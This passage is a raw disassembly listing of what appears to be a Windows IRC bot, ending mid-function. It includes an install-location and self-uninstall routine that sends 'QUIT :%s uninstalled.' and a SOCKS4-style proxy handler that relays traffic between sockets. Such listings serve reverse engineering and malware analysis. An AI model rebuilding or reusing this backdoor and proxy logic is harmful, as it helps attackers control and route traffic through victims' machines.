sub_407148 proc near ; CODE XREF: sub_402A32+7BB�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset dword_41EB2C
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset dword_41EB2C
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset dword_41EB2C
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40732D proc near ; DATA XREF: sub_40764D+145�o
var_16F0 = dword ptr -16F0h
var_16EC = dword ptr -16ECh
var_16E8 = dword ptr -16E8h
var_16E4 = dword ptr -16E4h
var_16E0 = byte ptr -16E0h
var_6E0 = byte ptr -6E0h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_5CF = byte ptr -5CFh
var_5CE = dword ptr -5CEh
var_5C8 = byte ptr -5C8h
var_1C8 = dword ptr -1C8h
var_1BE = byte ptr -1BEh
var_1AE = byte ptr -1AEh
var_1B = byte ptr -1Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_1C8]
mov [ebp+var_5D4], eax
push 0
push 408h
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40738F
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: sub_40732D+5A�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: sub_40732D+60�j
movzx eax, [ebp+var_5D0]
cmp eax, 4
jnz short loc_4073BA
movzx eax, [ebp+var_5CF]
cmp eax, 1
jnz short loc_4073BA
mov [ebp+var_16EC], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: sub_40732D+73�j
; sub_40732D+7F�j
and [ebp+var_16EC], 0
loc_4073C1: ; CODE XREF: sub_40732D+8B�j
mov eax, [ebp+var_16EC]
mov [ebp+var_4], eax
movsx eax, [ebp+var_1BE]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp+var_1BE]
push eax
lea eax, [ebp+var_5C8]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and [ebp+var_4], 0
loc_4073F5: ; CODE XREF: sub_40732D+A6�j
; sub_40732D+C2�j
movsx eax, [ebp+var_1B]
test eax, eax
jz short loc_407456
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_5D4]
call sub_4044F7
pop ecx
pop ecx
cmp [ebp+var_4], 0
jz short loc_407423
mov [ebp+var_16F0], offset byte_41DE30
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_40732D+E8�j
mov [ebp+var_16F0], offset dword_418EEC
loc_40742D: ; CODE XREF: sub_40732D+F4�j
push [ebp+var_16F0]
movzx eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_6E0]
push eax
push offset dword_418EB8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: sub_40732D+CE�j
cmp [ebp+var_4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_40732D+12D�j
push 0Ah
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE]
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE+2]
call ds:dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_5E0], eax
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp [ebp+var_5E0], 0
jnz short loc_407537
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_40732D+1D7�j
mov [ebp+var_5CF], 5Ah
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: sub_40732D+2FD�j
push [ebp+var_5D4]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call ds:dword_417248 ; recv
mov [ebp+var_16E4], eax
cmp [ebp+var_16E4], 0
jz short loc_407597
cmp [ebp+var_16E4], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: sub_40732D+25F�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: sub_40732D+268�j
push [ebp+var_16E4]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: sub_40732D+236�j
; sub_40732D+28C�j
push [ebp+var_5E0]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call ds:dword_417248 ; recv
mov [ebp+var_16E8], eax
cmp [ebp+var_16E8], 0
jz short loc_4075FF
cmp [ebp+var_16E8], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: sub_40732D+2C7�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: sub_40732D+2D0�j
push [ebp+var_16E8]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: sub_40732D+29E�j
; sub_40732D+2F1�j
push 32h
call ds:dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_40732D:loc_407597�j
; sub_40732D+28E�j ...
push [ebp+var_5D4]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: sub_40732D+64�j
; sub_40732D+16E�j ...
leave
retn 4
sub_40732D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40764D proc near ; DATA XREF: sub_4077DD+B4�o
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1BC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jnz short loc_4076A8
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: sub_40764D+46�j
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp+var_1A6]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: sub_40764D+B9�j
; sub_40764D+E1�j ...
push 3E8h
push [ebp+var_1C4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp [ebp+var_1C8], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: sub_40764D+A0�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: sub_40764D+A9�j
cmp [ebp+var_1C8], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: sub_40764D+B7�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_407730
push [ebp+var_1C8]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_40764D+D3�j
mov eax, [ebp+var_1CC]
mov ecx, [ebp+var_1C8]
mov [eax], ecx
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1CC]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1B6]
push eax
mov eax, [ebp+var_1CC]
add eax, 0Ah
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp+var_1A6]
push eax
mov eax, [ebp+var_1CC]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_1CC]
push offset sub_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push [ebp+var_1CC]
call sub_416B4C ; free
pop ecx
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: sub_40764D+153�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40764D:loc_4076F8�j
push [ebp+var_1C4]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: sub_40764D+56�j
leave
retn 4
sub_40764D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DE30
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset sub_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: sub_4083AD+2F2�p
